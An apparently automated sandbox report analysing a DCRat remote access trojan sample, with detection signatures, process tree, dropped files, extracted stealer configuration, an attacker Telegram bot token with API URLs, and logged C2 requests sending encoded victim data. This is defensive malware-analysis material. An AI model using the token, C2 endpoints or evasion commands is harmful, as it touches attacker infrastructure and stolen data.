File name:

3cfca059a9110f3137c1786a194b2f6e.exe

Full analysis: https://app.any.run/tasks/49ebd6b8-e6e7-4127-ae52-470c11df49e1
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Malware Trends Tracker     >>>
Analysis date: May 17, 2025, 22:53:49
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-sch
dcrat
rat
remote
darkcrystal
telegram
exfiltration
stealer
evasion
netreactor
susp-powershell
ims-api
generic
api-base64
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

3CFCA059A9110F3137C1786A194B2F6E

SHA1:

1B38A5CDFA19342E8F6B392F7A2CB2663237119A

SHA256:

BA53ACDB7D2C6AB550EC8696242A76EF562CA7DA24C39656184D7E5333838177

SSDEEP:

49152:Iy7GRR+LlvmalTqn+WpVlAvkgfCjhS/PGvSJt4v1rBH5fc0vW82WI04yS:Iyi3UtlnglIalS/V8v1ZNc0+8TgT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 7680)

    • DCRAT mutex has been found

      • StartMenuExperienceHost.exe (PID: 7280)

    • DARKCRYSTAL has been detected (SURICATA)

      • StartMenuExperienceHost.exe (PID: 7280)

    • Actions looks like stealing of personal data

      • StartMenuExperienceHost.exe (PID: 7280)

    • Steals credentials from Web Browsers

      • StartMenuExperienceHost.exe (PID: 7280)

    • Attempting to use instant messaging service

      • StartMenuExperienceHost.exe (PID: 7280)

    • Stealers network behavior

      • StartMenuExperienceHost.exe (PID: 7280)

    • DCRAT has been detected (YARA)

      • StartMenuExperienceHost.exe (PID: 7280)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • 3cfca059a9110f3137c1786a194b2f6e.exe (PID: 7636)
      • bridgeComCommon.exe (PID: 7816)

    • Reads security settings of Internet Explorer

      • 3cfca059a9110f3137c1786a194b2f6e.exe (PID: 7636)
      • bridgeComCommon.exe (PID: 7816)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 7680)
      • bridgeComCommon.exe (PID: 7816)

    • The process creates files with name similar to system file names

      • bridgeComCommon.exe (PID: 7816)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 7680)
      • bridgeComCommon.exe (PID: 7816)

    • Executed via WMI

      • schtasks.exe (PID: 7948)
      • schtasks.exe (PID: 7988)
      • schtasks.exe (PID: 7968)
      • schtasks.exe (PID: 8016)
      • schtasks.exe (PID: 8036)
      • schtasks.exe (PID: 8056)
      • schtasks.exe (PID: 8084)
      • schtasks.exe (PID: 8100)
      • schtasks.exe (PID: 8116)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7680)

    • Likely accesses (executes) a file from the Public directory

      • schtasks.exe (PID: 8036)
      • schtasks.exe (PID: 8016)
      • schtasks.exe (PID: 8056)
      • sppsvc.exe (PID: 7292)

    • Reads the date of Windows installation

      • bridgeComCommon.exe (PID: 7816)

    • Probably delay the execution using 'w32tm.exe'

      • cmd.exe (PID: 8168)

    • Checks for external IP

      • svchost.exe (PID: 2196)
      • StartMenuExperienceHost.exe (PID: 7280)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • StartMenuExperienceHost.exe (PID: 7280)

    • Loads DLL from Mozilla Firefox

      • StartMenuExperienceHost.exe (PID: 7280)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • StartMenuExperienceHost.exe (PID: 7280)

    • The process connected to a server suspected of theft

      • StartMenuExperienceHost.exe (PID: 7280)

    • There is functionality for taking screenshot (YARA)

      • StartMenuExperienceHost.exe (PID: 7280)

  • INFO

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • 3cfca059a9110f3137c1786a194b2f6e.exe (PID: 7636)

    • The sample compiled with english language support

      • 3cfca059a9110f3137c1786a194b2f6e.exe (PID: 7636)
      • bridgeComCommon.exe (PID: 7816)

    • Reads the computer name

      • 3cfca059a9110f3137c1786a194b2f6e.exe (PID: 7636)
      • bridgeComCommon.exe (PID: 7816)
      • dasHost.exe (PID: 2284)
      • sppsvc.exe (PID: 7292)
      • bridgeComCommon.exe (PID: 5380)
      • StartMenuExperienceHost.exe (PID: 7280)

    • Checks supported languages

      • 3cfca059a9110f3137c1786a194b2f6e.exe (PID: 7636)
      • bridgeComCommon.exe (PID: 7816)
      • StartMenuExperienceHost.exe (PID: 7280)
      • sppsvc.exe (PID: 7292)
      • dasHost.exe (PID: 2284)
      • bridgeComCommon.exe (PID: 5380)

    • Process checks computer location settings

      • 3cfca059a9110f3137c1786a194b2f6e.exe (PID: 7636)
      • bridgeComCommon.exe (PID: 7816)

    • Reads the machine GUID from the registry

      • bridgeComCommon.exe (PID: 7816)
      • StartMenuExperienceHost.exe (PID: 7280)
      • sppsvc.exe (PID: 7292)
      • dasHost.exe (PID: 2284)
      • bridgeComCommon.exe (PID: 5380)

    • Failed to create an executable file in Windows directory

      • bridgeComCommon.exe (PID: 7816)

    • Reads Environment values

      • bridgeComCommon.exe (PID: 7816)
      • sppsvc.exe (PID: 7292)
      • dasHost.exe (PID: 2284)
      • StartMenuExperienceHost.exe (PID: 7280)
      • bridgeComCommon.exe (PID: 5380)

    • Create files in a temporary directory

      • bridgeComCommon.exe (PID: 7816)
      • StartMenuExperienceHost.exe (PID: 7280)

    • Manual execution by a user

      • sppsvc.exe (PID: 7292)
      • dasHost.exe (PID: 2284)
      • StartMenuExperienceHost.exe (PID: 7280)

    • Disables trace logs

      • StartMenuExperienceHost.exe (PID: 7280)

    • Reads product name

      • StartMenuExperienceHost.exe (PID: 7280)

    • Attempting to use instant messaging service

      • StartMenuExperienceHost.exe (PID: 7280)
      • svchost.exe (PID: 2196)

    • Reads the software policy settings

      • StartMenuExperienceHost.exe (PID: 7280)
      • slui.exe (PID: 7384)

    • Checks proxy server information

      • StartMenuExperienceHost.exe (PID: 7280)
      • slui.exe (PID: 7384)

    • Potential library load (Base64 Encoded 'LoadLibrary')

      • StartMenuExperienceHost.exe (PID: 7280)

    • Found Base64 encoded access to Windows Defender via PowerShell (YARA)

      • StartMenuExperienceHost.exe (PID: 7280)

    • Potential dynamic function import (Base64 Encoded 'GetProcAddress')

      • StartMenuExperienceHost.exe (PID: 7280)

    • .NET Reactor protector has been detected

      • StartMenuExperienceHost.exe (PID: 7280)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

DcRat

(PID) Process(7280) StartMenuExperienceHost.exe
C2 (1)http://mdfhyparat.temp.swtest.ru/6ead1bc6
Options
MutexDCR_MUTEX-JRDuobWuLtUUbygeS0Wx
savebrowsersdatatosinglefilefalse
ignorepartiallyemptydatafalse
cookiestrue
passwordstrue
formstrue
cctrue
historyfalse
telegramtrue
steamtrue
discordtrue
filezillatrue
screenshottrue
clipboardtrue
sysinfotrue
searchpath%UsersFolder% - Fast
Targetru
C2 (1)http://mdfhyparat.temp.swtest.ru/6ead1bc6
Options
MutexDCR_MUTEX-JRDuobWuLtUUbygeS0Wx
Debugfalse
ServerConfigReplacementTable
0%
6|
9&
H<
X
j;
h$
Z!
U_
y@
m)
t`
F#
L.
c>
b,
u^
a*
d(
i~
E-
PluginConfigReplacementTable
0`
1;
2*
9_
F.
M
L^
p&
R>
V,
Z$
P)
l-
d~
a@
o%
N!
B<
E(
J|
y#
GetWebcamsfalse
SleepTimeout5
InactivityTimeout2
CacheStorageRegistry
AutoRunSmart
StealerConfig
savebrowsersdatatosinglefilefalse
ignorepartiallyemptydatafalse
cookiestrue
passwordstrue
formstrue
cctrue
historyfalse
telegramtrue
steamtrue
discordtrue
filezillatrue
screenshottrue
clipboardtrue
sysinfotrue
searchpath%UsersFolder% - Fast
StealerEnabledtrue
StealerOptionsfalse
SelfDeletefalse
Version4.5.32
ServerTypeC#

ims-api

(PID) Process(7280) StartMenuExperienceHost.exe
Telegram-Tokens (1)7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo
Telegram-Info-Links
7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo
Get info about bothttps://api.telegram.org/bot7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo/getMe
Get incoming updateshttps://api.telegram.org/bot7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo/getUpdates
Get webhookhttps://api.telegram.org/bot7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo
End-PointsendMessage
Args
chat_id (1)@MyRatDc_Rat_bot
text (1)📎 Log collected 📎 • ID: 2f042edc17de20b9ebb69178e954acd721e90592 • Scanned Directories: 0 • Elapsed Time: 00:00:03.4271953 HTTP/1.1 Host: api.telegram.org 94.0) Gecko/20100101 Firefox/94.0 Host: mdfhyparat.temp.swtest.ru Connection: Keep-Alive
Token7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo
End-PointsendPhoto
Args
chat_id (1)@MyRatDc_Rat_bot
caption (1)❕ User connected ❕ • ID: 2f042edc17de20b9ebb69178e954acd721e90592 • Comment: • User Name%3
Token7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo
End-PointsendMessage
Args
chat_id (1)@MyRatDc_Rat_bot
text (1)📎 Log collected 📎 • ID: 2f042edc17de20b9ebb69178e954acd721e90592 • Scanned Directories: 0 �
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:03:03 13:15:57+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.3
CodeSize: 203776
InitializedDataSize: 116736
UninitializedDataSize: -
EntryPoint: 0x1f530
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
142
Monitored processes
23
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start 3cfca059a9110f3137c1786a194b2f6e.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs bridgecomcommon.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs conhost.exe no specs w32tm.exe no specs #DCRAT startmenuexperiencehost.exe sppsvc.exe no specs dashost.exe no specs bridgecomcommon.exe no specs svchost.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2284C:\bridgewebreviewsavesruntime\dasHost.exeC:\bridgewebreviewsavesruntime\dasHost.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\bridgewebreviewsavesruntime\dashost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
4980w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 C:\Windows\System32\w32tm.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Time Service Diagnostic Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\w32tm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\advapi32.dll
5380"C:\bridgewebreviewsavesruntime\bridgeComCommon.exe" C:\bridgewebreviewsavesruntime\bridgeComCommon.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\bridgewebreviewsavesruntime\bridgecomcommon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
7280C:\bridgewebreviewsavesruntime\StartMenuExperienceHost.exeC:\bridgewebreviewsavesruntime\StartMenuExperienceHost.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Version:
5.15.2.0
Modules
Images
c:\bridgewebreviewsavesruntime\startmenuexperiencehost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
DcRat
(PID) Process(7280) StartMenuExperienceHost.exe
C2 (1)http://mdfhyparat.temp.swtest.ru/6ead1bc6
Options
MutexDCR_MUTEX-JRDuobWuLtUUbygeS0Wx
savebrowsersdatatosinglefilefalse
ignorepartiallyemptydatafalse
cookiestrue
passwordstrue
formstrue
cctrue
historyfalse
telegramtrue
steamtrue
discordtrue
filezillatrue
screenshottrue
clipboardtrue
sysinfotrue
searchpath%UsersFolder% - Fast
Targetru
(PID) Process(7280) StartMenuExperienceHost.exe
C2 (1)http://mdfhyparat.temp.swtest.ru/6ead1bc6
Options
MutexDCR_MUTEX-JRDuobWuLtUUbygeS0Wx
Debugfalse
ServerConfigReplacementTable
0%
6|
9&
H<
X
j;
h$
Z!
U_
y@
m)
t`
F#
L.
c>
b,
u^
a*
d(
i~
E-
PluginConfigReplacementTable
0`
1;
2*
9_
F.
M
L^
p&
R>
V,
Z$
P)
l-
d~
a@
o%
N!
B<
E(
J|
y#
GetWebcamsfalse
SleepTimeout5
InactivityTimeout2
CacheStorageRegistry
AutoRunSmart
StealerConfig
savebrowsersdatatosinglefilefalse
ignorepartiallyemptydatafalse
cookiestrue
passwordstrue
formstrue
cctrue
historyfalse
telegramtrue
steamtrue
discordtrue
filezillatrue
screenshottrue
clipboardtrue
sysinfotrue
searchpath%UsersFolder% - Fast
StealerEnabledtrue
StealerOptionsfalse
SelfDeletefalse
Version4.5.32
ServerTypeC#
ims-api
(PID) Process(7280) StartMenuExperienceHost.exe
Telegram-Tokens (1)7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo
Telegram-Info-Links
7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo
Get info about bothttps://api.telegram.org/bot7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo/getMe
Get incoming updateshttps://api.telegram.org/bot7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo/getUpdates
Get webhookhttps://api.telegram.org/bot7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo
End-PointsendMessage
Args
chat_id (1)@MyRatDc_Rat_bot
text (1)📎 Log collected 📎 • ID: 2f042edc17de20b9ebb69178e954acd721e90592 • Scanned Directories: 0 • Elapsed Time: 00:00:03.4271953 HTTP/1.1 Host: api.telegram.org 94.0) Gecko/20100101 Firefox/94.0 Host: mdfhyparat.temp.swtest.ru Connection: Keep-Alive
Token7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo
End-PointsendPhoto
Args
chat_id (1)@MyRatDc_Rat_bot
caption (1)❕ User connected ❕ • ID: 2f042edc17de20b9ebb69178e954acd721e90592 • Comment: • User Name%3
Token7523373811:AAG222Jtrmxkeic-xhQmB80We75JhJG4wwo
End-PointsendMessage
Args
chat_id (1)@MyRatDc_Rat_bot
text (1)📎 Log collected 📎 • ID: 2f042edc17de20b9ebb69178e954acd721e90592 • Scanned Directories: 0 �
7292C:\Users\Public\Music\sppsvc.exeC:\Users\Public\Music\sppsvc.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\users\public\music\sppsvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
7384C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7636"C:\Users\admin\Desktop\3cfca059a9110f3137c1786a194b2f6e.exe" C:\Users\admin\Desktop\3cfca059a9110f3137c1786a194b2f6e.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\3cfca059a9110f3137c1786a194b2f6e.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
7680"C:\WINDOWS\System32\WScript.exe" "C:\bridgewebreviewsavesruntime\3IPOrujwoDLpB5shDfS60WhJ.vbe" C:\Windows\SysWOW64\wscript.exe3cfca059a9110f3137c1786a194b2f6e.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
7752C:\WINDOWS\system32\cmd.exe /c ""C:\bridgewebreviewsavesruntime\FzYwKCOtM.bat" "C:\Windows\SysWOW64\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
Total events
10 408
Read events
10 391
Write events
17
Delete events
0

Modification events

(PID) Process:(7636) 3cfca059a9110f3137c1786a194b2f6e.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation:writeName:VBEFile
Value:
(PID) Process:(7816) bridgeComCommon.exeKey:HKEY_CURRENT_USER\SOFTWARE\27fabb321536080a2efd2d17febbc02186a8d673
Operation:writeName:ac47ec03ebacea4236c15e80407dc5ac37459cdb
Value:
WyJDOlxcYnJpZGdld2VicmV2aWV3c2F2ZXNydW50aW1lXFxicmlkZ2VDb21Db21tb24uZXhlIiwiQzpcXGJyaWRnZXdlYnJldmlld3NhdmVzcnVudGltZVxcU3RhcnRNZW51RXhwZXJpZW5jZUhvc3QuZXhlIiwiQzpcXFVzZXJzXFxQdWJsaWNcXE11c2ljXFxzcHBzdmMuZXhlIiwiQzpcXGJyaWRnZXdlYnJldmlld3NhdmVzcnVudGltZVxcZGFzSG9zdC5leGUiXQ==
(PID) Process:(7280) StartMenuExperienceHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7280) StartMenuExperienceHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7280) StartMenuExperienceHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7280) StartMenuExperienceHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(7280) StartMenuExperienceHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(7280) StartMenuExperienceHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(7280) StartMenuExperienceHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(7280) StartMenuExperienceHost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\StartMenuExperienceHost_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
4
Suspicious files
22
Text files
7
Unknown types
0

Dropped files

PID
Process
Filename
Type
76363cfca059a9110f3137c1786a194b2f6e.exeC:\bridgewebreviewsavesruntime\3IPOrujwoDLpB5shDfS60WhJ.vbebinary
MD5:F6BBC9CF6DEBE554B3617B7E4C362B83
SHA256:37DA4EE9691293035D86EB6F31D81CD9105125FA70BCBFA31C3574F1B729704F
7816bridgeComCommon.exeC:\bridgewebreviewsavesruntime\55b276f4edf653text
MD5:2E4F3B6287CD96A2859013A1B61FD539
SHA256:D2353E9D78D891E41A7E9844A141EC15E5D0E1D9A9B7626C3906F193C11D71F3
7816bridgeComCommon.exeC:\Users\admin\AppData\Local\Temp\5UNLWqombI.battext
MD5:23658E0EC51181B43F333D12FAA52D26
SHA256:FFD894BB517C41FDEF1CAB142EAE9569AA2A18A38EFB995CD0D63D9348051390
76363cfca059a9110f3137c1786a194b2f6e.exeC:\bridgewebreviewsavesruntime\FzYwKCOtM.battext
MD5:6A76215BE9A3D223A7E8663D60CA53F7
SHA256:F852446C102BC80D4761F60447058F89E691293AF290620A49B4C26F15E9D5D4
7816bridgeComCommon.exeC:\Users\Public\Music\sppsvc.exeexecutable
MD5:9F7CAA406A2F33276709E4AAA148D81B
SHA256:D424143D7DCA282377D4E1A53654E6B11B8FA9A9B7EA207C5D555DED1AB120E9
7816bridgeComCommon.exeC:\Users\Public\Music\0a1fd5f707cd16text
MD5:280B9B41C84A97AEC4B7FBF31C0984F9
SHA256:24DC2DA8ADC03C8CF1ABEFCD3CB495420DE6F7BBFE0FF85C39910955AA2F9325
76363cfca059a9110f3137c1786a194b2f6e.exeC:\bridgewebreviewsavesruntime\bridgeComCommon.exeexecutable
MD5:9F7CAA406A2F33276709E4AAA148D81B
SHA256:D424143D7DCA282377D4E1A53654E6B11B8FA9A9B7EA207C5D555DED1AB120E9
7280StartMenuExperienceHost.exeC:\Users\admin\AppData\Local\Temp\6Zxn0Evvhebinary
MD5:91DBAF73C1A8C55254D90272F998E412
SHA256:0628922305D2478BA75A48EFADF932D439616EAF1FF908BE334793F7BDE28107
7280StartMenuExperienceHost.exeC:\Users\admin\AppData\Local\Temp\Uol2AgojpBbinary
MD5:46D9FCA6032297F8AEE08D73418312BA
SHA256:865856FA4C33C4AEE52E15FBB370B6611468FE947E76E197F0E50D0AD62CB1B4
7280StartMenuExperienceHost.exeC:\Users\admin\AppData\Local\Temp\IGp3P3XqTWbinary
MD5:1AA08FF2105515DE3602F503E87DFF1A
SHA256:D7446E2F307027C9BDA2A92D1DF1C13C376581372F6AE8708F4D5BACCB2E6813
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
112
TCP/UDP connections
48
DNS requests
17
Threats
15

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7280
StartMenuExperienceHost.exe
GET
200
77.222.40.238:80
http://mdfhyparat.temp.swtest.ru/6ead1bc6.php?loojYNLr=SmdZBo2a8F26nVqYJsDG&7732b393dcc53b2be708853a3e82e561=94699b045e86347272a8defdecca36a7&146a877accfd3523e6f308ba932392b2=QMwIjZmJ2YjZDMkhDN1kDMwczYiZ2N3ADM3MDZiJWNjNWZhVGNjRzM&loojYNLr=SmdZBo2a8F26nVqYJsDG
unknown
malicious
7280
StartMenuExperienceHost.exe
GET
200
77.222.40.238:80
http://mdfhyparat.temp.swtest.ru/6ead1bc6.php?Q2L4uHpT4dky3lcFaeq4wl=l1solmQCIMKRyAEqW&ptTXPE9BOD1ak2pV=DBdEqnabmsTnFVyUaH2&4352bb6baae538c47675a6ba23a6dd3e=QOiNTYyQ2MyATOihTY2IzNmFjM0UjMhhTO5YGZygDZkVTN5kDM3QWYzQjM3ATO5cDNxITN0UTO&146a877accfd3523e6f308ba932392b2=QOxIGO0EjN4QGZkJ2M3UmYyIjZlNTNyIGNxATOhRWZiJWZjFGMmJjN&92f1431c1a7bed8a72759fdb4dc10903=d1nI5YTNkNjM2UzNyADM4ETZ3UGZkZ2Y4MDMwcTZ5gDMxUWOjJWO4UWYmJiOiUWZyIDOwcDMyYzYjZ2Y5kjMxQDN4MWN2cjNxUDOmlDMiwiIykTNwkTZxIzNkNWY0UTOlhzNxkjNiJWZ5IGMyUGZ3EzYkVmM0AjZyIiOiATZhN2NwkTZiFGZmVTO4YWZ4kDZ4EzYzMWYiJDO2IzNis3W&075811e976b3f3c96983b5d5554ae634=QX9JiI6ICO1I2N2UWOxIzM5EDMilzM4EDM4kjM4E2YxMGZ4YGN1ICLikjN1Q2MyYTN3IDMwgTMldTZkRmZjhzMwAzNllDOwETZ5MmY5gTZhZmI6ISZlJjM4AzNwIjNjNmZjlTOyEDN0gzY1YzN2ETN4YWOwICLiITO1ATOlFjM3Q2YhRTN5UGO3ETO2ImYlljYwITZkdTMjRWZyQDMmJjI6ICMlF2Y3ATOlJWYkZWN5gjZlhTOkhTMjNzYhJmM4YjM3Iyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUa0sWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKl3YwpEWZFVOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaVJTW1ZUbjdkQTx0ZRdlWwp1VhpmVHNmeCNEZ2V